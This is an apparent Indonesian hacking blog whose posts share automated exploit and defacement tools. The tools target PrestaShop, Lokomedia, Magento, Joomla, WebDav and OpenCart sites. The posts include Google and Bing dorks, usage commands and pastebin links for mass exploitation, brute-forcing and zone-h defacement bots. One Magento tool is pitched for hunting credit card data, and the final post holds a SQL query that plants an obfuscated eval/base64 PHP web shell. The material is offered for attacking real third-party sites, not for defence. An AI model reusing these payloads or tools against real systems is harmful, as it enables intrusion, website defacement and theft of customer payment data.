Prestashop Module Blocktestimonial File Upload

================================================================
[+] Google Dork: inurl:"/modules/blocktestimonial/"
[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php
[+] Tutorial:
- http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html
- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html
[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based )
================================================================

Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....

Silakan download exploiternya, lalu upload di shell/hosting untuk menjalankannya

Oke Sekian dulu, happy hacking :D

NB: Sumber tertera diatas

Read more

Bot Auto Tusbol Hosting Nazuka

Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha :D .

Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security. Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya.

Untuk script nya bisa download disini :

Bot Auto Tusbol Nazuka

Sebelumnya thanks banget buat Mr.MaGnoM, atas referensi bing dorker nya. Big respect bro :)

Oh iya, disini ada beberapa parameter yang harus diubah.

$zh = "zafk1el"; 

Itu nick zone-h. Silahkan diganti sendiri ya.

Lalu bagian 

$isi_nama_doang = 

Yang di encode tersebut script deface . Jadi silahkan diganti dengan cara encode terlebih dahulu script deface kalian ke base64 lalu masukkan kesitu.

Cara pakainya gimana bang ?

Gampang banget. 

Tinggal masukkan perintah

php namafile.php

Lalu enter. Selanjutnya masukkan bing dork nya.

PS : Ini CLI based, bukan web based. Dan juga ini BING dorker, jadi jangan pakai dork google. 

Thanks.

Read more

Lokomedia (SQL Injection) + Auto Scan Admin Login + Auto Crack Password

Hallo~~ selamat malam, kali ini gua akan share tools lagi buat kalian penyuka exploit sql injection CMS Lokomedia.
Biar ga pusing-pusing, ini tools gua buat supaya lebih mudah aja hehehe

Oke Langsung aja ini dia penampakan tools nya: [ CLI ]

[ Web Based ]

Cara Pake: [CLI]
- Masukan file lokomedia.php dan target.txt nya kedalam 1 folder yang sama.
- format target di dalam file target.txt

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/

- bukalah cmd (install xampp terlebih dahulu jika kalian menggunakan OS Windows).
jalankan command berikut: php lokomedia.php target.txt

Cara Pake: [Web Based]
- upload script ke hosting/shell kalian.
- buka file exploiter tersebut ( web.com/lokomedia.php )
- masukan targetnya

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/

LINK [ CLI ] -> http://pastebin.com/sPpJRjCZ
LINK [ Web Based ] -> http://pastebin.com/0STXanAx

mudah bukan? hehehe.
Oke Sekian dulu, selamat malamm ^^

Read more

Magento Bot with Bing Dorker

Assalamualaikum, selamat malam gannnn......
Sorry baru ini gua posting lagi di karenakan sekarang udah jarang dpt exploit" fresh wkwkwkk dan bingung juga mau bikin tutor apa. :v

Okee gausah panjang lebar, dalam kesempatan kali ini gua pgn share sebuah tools untuk para Logger yang doyan mainan magento buat cari cc dll :v.

Ini dia penampakan toolsnya:

Tools ini sudah dibuat sedimikian rupa dan pastinya enak dipake :v aman gaada logger karena gua share secara [open source] :).
Dalam tools ini, gua menggabungkan beberapa tools sekaligus + membuatnya semakin mudah dengan memakai Bing Dorker. ( duduk tenang aja gannn, masukin dork -> tunggu mangsa hehehehe :D ).

fitur:
- Magento Add Admin Xploit
=> detect filesystem
=> detect downloader+permission
=> get info average order,lifetime sales,quantity order
=> get info total customers
=> get info installed packages.
- Magento Webforms Xploit

Link-> http://pastebin.com/aGh7w1Ub

*NB: usage: php namafile.php 'bing_dorker'
*NB: php magento.php '"/customer/account/login" site:it'
*NB: $shell = "id.php"; // ganti id.php dengan shell kalian yang berada dalam 1 Folder dengan tools ini *NB: INGET DISINI KITA PAKE DORK BING, BUKAN GOOGLE DORK!!!
dalam tools ini, result target yang berhasil di exploit tidak otomatis tersimpan dalam sebuah file.txt, jadi kalian harus cek 1 1 target kalian yang berhasil di exploit di Terminal/CMD nya langsung. ( maaf gan, ga kepikiran , keburu di publish wkwkw )

Oke sekian duluuu,
Thanks to: Mr. Magnom ( for bing dorker )
Greetz: IndoXploit - Sanjungan Jiwa - Jloyal - Jancok Sec - Res7ock Crew

Read more

Full Bot Deface Website

Hai semuanya, udah lama banget ngk buat tutor. Gw udh mulai bosen dgn semua ini. Makanya gw pengen share Tools yang menurut gw manteb untuk maen bot - botan..

Cara kerja tools ini ialah dengan mengambil nama domain dari web mirror zone-deface.com, abis itu dapetin ip-nya. nah ipnya kita scan deh di bing. Abis itu kita grab lagi dan kita scan cms apa yg dipakai, terus di save sesuai cmsnya dan di eksploitasi sesuai cms-nya.

Tapi disini gw cuma ada exploit com_media, jce, jdownloads..
untuk yg laen lu cari sendiri ya.

Download Tools disini.
https://drive.google.com/file/d/0B4_2Vn34hkX1V1JYcDFXSlZ2VzQ/view?usp=sharing

command:
php ambil.php attacker_Tu5b0l3d 72 && perl setan.pl ip.htm 31 && php detek.php target_setan.htm && php exploit.php 1-Joomla.htm

catatan:
72 itu ialah page akhir dari attacker_Tu5b0l3d
sesuain sama attacker/team yg mau di grab di http://zone-deface.com/

31 itu page paling akhir pas scan di bing.
klo mau scan sampe 50 page, ubah jadi 51

exploit.php itu isinya ada exploit com_media, jce, jdownloads.
ganti di k.txt dan k.png,
pkoknya harus ada kata - kata hacked.
ganti juga nick di zone-h

1-Joomla.htm itu list joomla site.

Video:
https://www.youtube.com/watch?v=GTocBpZ8eXM

##.
Thx buat bang fyelix yang udah ngasih VPS.

https://www.facebook.com/groups/indoxploitpublic/

Read more

Auto Exploiter WebDav PHP

Auto Exploiter WebDav thx to @Aderoot

Tool webdav yang terkenal yaitu toolnya hmei7, tapi kali ini ane pengen share tool webdav versi php.

script:
http://pastebin.com/eTmsR6JA

video:
https://www.youtube.com/watch?v=LXmfzEVM0mM

bagi yang belum tau cara menjalankannya.
cek cara menjalankan exploiter php

yuk join!
https://www.facebook.com/groups/indoxploitpublic/

keep share.

Read more

PrestaShop Auto Deface by iDx

Dalam zip ini, udah ada exploiter,doc root,shell idx.
dan didalam source exploiternyaa, sudah ada penjelasan, file" apa yang boleh diganti dan tidak diganti, selebihnya harap ikutin code yang ada , daripada nantinya error, tanggung sendiri:p

fitur:
- auto tanem backdoor
- auto deface
- hasil nya ke simpen dalam "hasil.txt", taro semuanya dalam 1 folder yang sama ( CLI version ) jalankan lewat cmd/terminal/vps

Cara Pake:
* masukan seluruh target anda ( full url: http://www.target.com/path/path/path/uploadimage.php ) ke dalam sebuah file.txt. * lalu jalankan cmd pada terminal seperti pada gambar diatas.

format target. ( dalam file.txt )
http://www.target1.com/path/path/path/uploadimage.php
http://www.target2.com/path/path/path/uploadimage.php
http://www.target3.com/path/path/path/uploadimage.php
http://www.target4.com/path/path/path/uploadimage.php
http://www.target5.com/path/path/path/uploadimage.php

Download: http://adf.ly/1bWOfF

Okee sekiann duluuuu ^^

Thanks to: Author exploit, sanjungan jiwa

Read more

Tool Bruteforce Fleksibel

Kali ini gw pengen share tool bruteforce yang menurut gw cukup fleksibel.
mirip kayak hydra kalo ngk salah.

tapi agak ribet, karena banyak parameter yang harus dimasukin.
yaudah langsung aja ini dia toolnya.

script:
http://pastebin.com/9Z5fUhNK

Usage:
php brute.php password.txt "username=admin&password=PASS::fail" url

PASS jangan diganti!

password.txt
password_1<br>password_2<br>password_3

fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login
ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah

url ganti jadi url action loginnya.

tonton videonya biar ngk bingung.
https://youtu.be/zt7XNISMf9g

keep share.
gabung yuk!
group

Read more

Mengambil kata menggunakan preg_match

Abis baca - baca thread lama gw di http://hacker-newbie.org/showthread.php?tid=20672
jadi terharuu..
ternyata udh 2 tahunan maenan exploiter.
sebelumnya gw ucapin byk2 terima kasih kepada bang sohai yang udah ngebimbing gw sejauh ini, bunglon_ijo yang ikut berjuang bersama - sama, rieqyns13 yang udah mau share scannernya.
dan buat lu semua yang udah mau baca tutor ini yang sebenarnya sih ngk terlalu berguna banget...


*Perhatikan kata demi kata yang tak bermakna ini.
sebelumnya mari baca - baca tentang preg_match dulu disini http://php.net/manual/en/function.preg-match.php

tapi disini ane cuma pengen share cara mengambil kata dengan preg_match.
untuk apasih ?

misalnya kita sedang membuat auto upload.
dan ternyata nama filenya menjadi random.
daripada susah - susah ngecek satu per satu secara manual, mending kita ambil aja nama file random itu dan kemudian cek.

mudah saja, misalnya disaat kita selesai upload, outputnya menjadi seperti ini.
"filename":"420331file.php" "message":"Your file has been uploaded"

oke, alurnya seperti ini.
upload -> dapet ouput -> ambil output

yaudah langsung saja.

setelah sudah mendapatkan nama filenya.
baru deh kita cek lagi menggunakan file_get_content atau curl, kemudian pakai preg_match lagi.
tapi karena ini tutor cuma untuk ngambil namanya aja,
yaudah segini aja.
ya mungkin ngk berarti sama sekali.

Tutorial membuat scanner/finder pada website

Correct me if i wrong.

Read more

Upload shell di cms opencart

kali ini ane pengen bagiin tutor upload shell di website cms opencart.
work versi 2 keatas..

cari targetnya bisa pake bruteforce disini
http://blog.indoxploit.or.id/2016/06/deface-dengan-opencart-bruteforce-and.html

langsung aja ke videonya ..
https://www.youtube.com/watch?v=CA6BvEopCEo

a.sql

SELECT '<?php eval (gzinflate(base64_decode("bZBNasNADIX3hd5hGLqIoW4OUHvIpoVCIIV0F4KRbY09MD/C1gRC8d3rcWJooaCNvqenJ4RNH4TswDP6rqgHJV8fHzBB6qmKHhxushXJdcDozVP1eTh+Zd9Ls2sCXWf0/rF/O56klueTZEdVssvz81/hBrNkTVvnparGoYfR2GJbqzxX8uU/x5w7oR3xl6+DDmw6aFrqrgpxv1aHwQmH3Ie2pDCyQN/wlbB00bIhGHibRvIWGFRhPEUWi66NRZFSS73ypbvc5DHWzrAw7QwuYCOWkdT6m+kH"))); ?>' FROM `mouwaffek_table`

thx to spyhackerz.com

Read more